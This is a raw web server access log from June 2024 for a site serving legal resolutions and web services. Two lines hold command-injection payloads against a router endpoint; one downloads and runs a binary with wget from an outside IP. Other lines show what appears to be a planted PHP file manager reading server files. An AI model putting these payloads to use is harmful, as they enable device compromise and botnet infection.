216.244.66.195 - - [20/Jun/2024:02:01:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/02429.pdf HTTP/1.1" 200 337798
201.245.192.253 - - [20/Jun/2024:02:01:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.122.15 - - [20/Jun/2024:02:01:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000209.tif&ft=notepad HTTP/1.1" 200 37770
216.244.66.195 - - [20/Jun/2024:02:01:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1092.pdf HTTP/1.1" 200 354201
201.245.192.253 - - [20/Jun/2024:02:01:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [20/Jun/2024:02:00:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.9 - - [20/Jun/2024:02:02:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/1013.pdf HTTP/1.1" 200 446993
47.128.122.190 - - [20/Jun/2024:02:02:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4592.pdf&ft=notepad&white=1 HTTP/1.1" 200 388809
216.244.66.195 - - [20/Jun/2024:02:02:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1246.pdf HTTP/1.1" 200 321755
201.245.192.253 - - [20/Jun/2024:02:02:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:02:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:02:01:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
216.244.66.195 - - [20/Jun/2024:02:03:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1609.pdf HTTP/1.1" 200 1064809
47.128.117.75 - - [20/Jun/2024:02:03:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3135.pdf&ft=img&white=1 HTTP/1.1" 200 20239
216.245.221.92 - - [20/Jun/2024:02:03:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:02:03:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.28.196 - - [20/Jun/2024:02:03:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2251-2300%5C&f=00002299.tif&white=1 HTTP/1.1" 200 153934
201.245.192.253 - - [20/Jun/2024:02:03:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [20/Jun/2024:02:03:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2008.pdf HTTP/1.1" 200 484579
201.245.192.253 - - [20/Jun/2024:02:03:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [20/Jun/2024:02:04:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:04:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.17.129 - - [20/Jun/2024:02:04:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1751-1800%5C&f=00001791.tif&ft=img&white=1 HTTP/1.1" 200 315140
216.244.66.195 - - [20/Jun/2024:02:04:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2502.pdf HTTP/1.1" 200 497980
172.22.2.4 - - [20/Jun/2024:02:05:10 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%20011%20del%2005%20de%20julio%20de%202017.pdf HTTP/1.1" 304 -
47.128.28.13 - - [20/Jun/2024:02:05:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5C&f=metalmecanica.swf&ft=img&white=1 HTTP/1.1" 200 397041
216.244.66.195 - - [20/Jun/2024:02:05:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0122.pdf HTTP/1.1" 200 484655
201.245.192.253 - - [20/Jun/2024:02:05:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:02:05:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [20/Jun/2024:02:05:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0521.pdf HTTP/1.1" 200 647483
47.128.112.247 - - [20/Jun/2024:02:06:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4630.pdf&ft=notepad&white=1 HTTP/1.1" 200 376521
201.245.192.253 - - [20/Jun/2024:02:06:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:06:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [20/Jun/2024:02:06:36 -0500] "GET /BLA/resoluciones/AUTOS%202007/2486.pdf HTTP/1.1" 200 177668
47.128.31.200 - - [20/Jun/2024:02:06:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2039.pdf&ft=notepad&white=1 HTTP/1.1" 200 360137
216.244.66.195 - - [20/Jun/2024:02:07:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/5560.pdf HTTP/1.1" 200 425237
201.245.192.253 - - [20/Jun/2024:02:07:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.19.146 - - [20/Jun/2024:02:07:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4212.pdf&ft=notepad&white=1 HTTP/1.1" 200 347849
216.244.66.195 - - [20/Jun/2024:02:07:42 -0500] "GET /galeria/galeria/fotos/Humedal-la-conejera2G.jpg HTTP/1.1" 200 298801
201.245.192.253 - - [20/Jun/2024:02:07:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [20/Jun/2024:02:06:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [20/Jun/2024:02:08:15 -0500] "GET /galeria/galeria/fotos/Soratama4G.jpg HTTP/1.1" 200 167128
47.128.49.91 - - [20/Jun/2024:02:08:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=60Segundos_Jul16.flv&ft=img&white=1 HTTP/1.1" 200 458511
201.245.192.253 - - [20/Jun/2024:02:08:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [20/Jun/2024:02:08:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:02:08:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [20/Jun/2024:02:08:36 -0500] "GET /Publicaciones/2024EE63916.pdf HTTP/1.1" 404 227
216.244.66.195 - - [20/Jun/2024:02:08:42 -0500] "GET /BLA/resoluciones/AUTOS%202015/03044.pdf HTTP/1.1" 200 1817339
172.22.2.4 - - [20/Jun/2024:02:07:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54300
201.245.192.253 - - [20/Jun/2024:02:08:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.24.29 - - [20/Jun/2024:02:08:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=class-wp-embed.php&ft=img&white=1 HTTP/1.1" 200 11355
201.245.192.253 - - [20/Jun/2024:02:09:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [20/Jun/2024:02:09:32 -0500] "GET /BLA/resoluciones/AUTOS%202023/02512.pdf HTTP/1.1" 200 600874
47.128.99.137 - - [20/Jun/2024:02:09:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cimages%5C&f=media-button-image.gif&ft=notepad HTTP/1.1" 200 200
201.245.192.253 - - [20/Jun/2024:02:09:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [20/Jun/2024:02:10:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/00444.pdf HTTP/1.1" 200 382232
201.245.192.253 - - [20/Jun/2024:02:10:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:10:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.53.215 - - [20/Jun/2024:02:10:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0229.pdf&ft=notepad&white=1 HTTP/1.1" 200 532169
45.148.10.174 - - [20/Jun/2024:02:10:42 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
45.148.10.174 - - [20/Jun/2024:02:10:43 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
47.128.30.81 - - [20/Jun/2024:02:11:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3926.pdf&ft=code&white=1 HTTP/1.1" 200 346588
201.245.192.253 - - [20/Jun/2024:02:11:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:02:11:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.31.136 - - [20/Jun/2024:02:11:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0658.pdf&ft=notepad&white=1 HTTP/1.1" 200 351945
66.249.66.19 - - [20/Jun/2024:02:12:14 -0500] "GET /BLA/resoluciones/AUTOS%202014/0954.pdf HTTP/1.1" 200 330829
66.249.66.19 - - [20/Jun/2024:02:12:15 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1566.pdf HTTP/1.1" 304 -
52.167.144.139 - - [20/Jun/2024:02:12:22 -0500] "GET /BLA/resoluciones/AUTOS%202022/2075.pdf HTTP/1.1" 200 382133
201.245.192.253 - - [20/Jun/2024:02:12:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:12:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.30.75 - - [20/Jun/2024:02:12:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2080.pdf&ft=notepad&white=1 HTTP/1.1" 200 374004
52.167.144.139 - - [20/Jun/2024:02:13:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2870.pdf HTTP/1.1" 200 575789
216.245.221.92 - - [20/Jun/2024:02:13:27 -0500] "HEAD / HTTP/1.1" 200 -
47.128.31.140 - - [20/Jun/2024:02:13:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5399.pdf&ft=notepad&white=1 HTTP/1.1" 200 372425
201.245.192.253 - - [20/Jun/2024:02:13:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:02:12:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:02:13:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:13:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.30.98 - - [20/Jun/2024:02:14:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3402.pdf&ft=img&white=1 HTTP/1.1" 200 1724175
201.245.192.253 - - [20/Jun/2024:02:14:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:14:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:02:12:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
47.128.50.21 - - [20/Jun/2024:02:14:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctomcat%5Clib%5C&f=ecj-4.2.2.jar&ft=img&white=1 HTTP/1.1" 200 20239
157.55.39.57 - - [20/Jun/2024:02:15:03 -0500] "GET /BLA/resoluciones/00001066.tif HTTP/1.1" 404 1018
201.245.192.253 - - [20/Jun/2024:02:15:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.23.36 - - [20/Jun/2024:02:15:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Chuelladecarbono%5C&f=._huella_carbono.html&ft=notepad&white=1 HTTP/1.1" 200 4096
201.245.192.253 - - [20/Jun/2024:02:15:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [20/Jun/2024:02:15:56 -0500] "GET /BLA/boletinlegal/.git/config HTTP/1.1" 404 1038
114.119.132.238 - - [20/Jun/2024:02:16:07 -0500] "GET /BLA/ HTTP/1.1" 200 538
201.245.192.253 - - [20/Jun/2024:02:16:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.48.120 - - [20/Jun/2024:02:16:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=1225.tif&ft=notepad&white=1 HTTP/1.1" 200 52584
201.245.192.253 - - [20/Jun/2024:02:16:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
69.171.249.3 - - [20/Jun/2024:02:17:00 -0500] "GET /cordoncillo-beneficioso-para-los-procesos-de-restauracion-ecologica-y-para-la-salud.html HTTP/1.1" 206 919
69.171.249.112 - - [20/Jun/2024:02:17:01 -0500] "GET /cordoncillo-beneficioso-para-los-procesos-de-restauracion-ecologica-y-para-la-salud.html HTTP/1.1" 200 919
69.171.249.2 - - [20/Jun/2024:02:17:01 -0500] "GET /images/pieza-ficha-flora-cordoncillo-22-enero.jpg HTTP/1.1" 200 260174
69.171.249.20 - - [20/Jun/2024:02:17:01 -0500] "GET /cordoncillo-beneficioso-para-los-procesos-de-restauracion-ecologica-y-para-la-salud.html HTTP/1.1" 200 919
186.77.136.162 - - [20/Jun/2024:02:17:01 -0500] "GET /images/pieza-ficha-flora-cordoncillo-22-enero.jpg HTTP/1.1" 200 260174
69.171.231.112 - - [20/Jun/2024:02:17:01 -0500] "GET /images/pieza-ficha-flora-cordoncillo-22-enero.jpg HTTP/1.1" 200 260174
47.128.36.189 - - [20/Jun/2024:02:17:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1751-1800%5C&f=00001767.tif&ft=notepad&white=1 HTTP/1.1" 200 195342
201.245.192.253 - - [20/Jun/2024:02:17:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:02:17:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.56.241 - - [20/Jun/2024:02:17:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2106.pdf&ft=notepad&white=1 HTTP/1.1" 200 20169
201.245.192.253 - - [20/Jun/2024:02:18:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [20/Jun/2024:02:18:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:02:18:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.28.62 - - [20/Jun/2024:02:18:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000226.tif&ft=notepad HTTP/1.1" 200 216392
201.245.192.253 - - [20/Jun/2024:02:17:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14506
201.245.192.253 - - [20/Jun/2024:02:18:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34815
201.245.192.253 - - [20/Jun/2024:02:18:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
66.249.66.20 - - [20/Jun/2024:02:19:17 -0500] "GET /Publicaciones/2024EE62935.pdf HTTP/1.1" 404 227
47.128.122.65 - - [20/Jun/2024:02:19:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5321.pdf&ft=img&white=1 HTTP/1.1" 200 519951
201.245.192.253 - - [20/Jun/2024:02:19:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:02:17:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:02:19:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33557
201.245.192.253 - - [20/Jun/2024:02:19:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/imagenes/br1c1.gif HTTP/1.1" 200 172
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/imagenes/Header.gif HTTP/1.1" 200 27040
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/imagenes/limpiar1.gif HTTP/1.1" 200 606
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/imagenes/br3c2.gif HTTP/1.1" 200 285
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/imagenes/br1c3.gif HTTP/1.1" 200 302
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/imagenes/br2c2.gif HTTP/1.1" 200 302
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/imagenes/br1c2.gif HTTP/1.1" 200 297
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/imagenes/Turnbo1.gif HTTP/1.1" 200 227
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/imagenes/aceptar1.gif HTTP/1.1" 200 604
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/imagenes/br3c1.gif HTTP/1.1" 200 177
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/imagenes/br3c3.gif HTTP/1.1" 200 186
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/imagenes/br2c1.gif HTTP/1.1" 200 297
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /catalogoisis/imagenes/br2c3.gif HTTP/1.1" 200 416
179.19.45.94 - - [20/Jun/2024:02:20:06 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
47.128.61.2 - - [20/Jun/2024:02:20:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2437.pdf&ft=notepad&white=1 HTTP/1.1" 200 401097
201.245.192.253 - - [20/Jun/2024:02:20:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34815
201.245.192.253 - - [20/Jun/2024:02:20:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [20/Jun/2024:02:18:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [20/Jun/2024:02:20:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.44.70 - - [20/Jun/2024:02:20:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4643.pdf&ft=img&white=1 HTTP/1.1" 200 20239
201.245.192.253 - - [20/Jun/2024:02:21:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.45.13 - - [20/Jun/2024:02:21:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0266.pdf&ft=notepad&white=1 HTTP/1.1" 200 327369
201.245.192.253 - - [20/Jun/2024:02:21:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.31.152 - - [20/Jun/2024:02:22:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2433.pdf&ft=notepad&white=1 HTTP/1.1" 200 97993
201.245.192.253 - - [20/Jun/2024:02:22:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:22:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.37.141 - - [20/Jun/2024:02:23:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000214.tif&ft=img&white=1 HTTP/1.1" 200 98052
216.245.221.92 - - [20/Jun/2024:02:23:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:02:23:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
